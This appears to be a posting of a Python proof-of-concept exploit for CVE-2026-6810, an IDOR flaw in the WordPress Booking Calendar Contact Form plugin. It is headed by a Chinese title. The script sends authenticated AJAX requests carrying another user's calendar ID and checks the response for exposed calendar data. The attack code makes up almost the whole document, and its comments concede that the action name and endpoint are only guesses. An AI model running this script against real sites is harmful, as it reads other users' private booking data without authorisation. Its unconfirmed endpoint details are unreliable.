CVE-2026-6810 WordPress插件IDOR漏洞

import requests def check_idor(target_url, cookie, victim_calendar_id): """ PoC for CVE-2026-6810: IDOR in Booking Calendar Contact Form. Attempts to access a calendar ID belonging to another user. """ headers = { "Cookie": cookie, "User-Agent": "PoC-Client/1.0" } # Targeting the vulnerable endpoint mentioned in the advisory # Note: The exact endpoint parameter structure might vary based on plugin implementation payload = { "action": "dex_bccf_get_calendar_list", # Example action "id": victim_calendar_id # The vulnerable user-controlled key } try: response = requests.post(target_url, data=payload, headers=headers) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:", response.text[:200]) # Analyze response to confirm data leakage if "calendar_details" in response.text: print("[!] Potential IDOR vulnerability confirmed: Data exposed.") else: print("[-] Data not exposed in response.") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") # Usage Example # check_idor("http://example.com/wp-admin/admin-ajax.php", "wordpress_logged_in...", "2")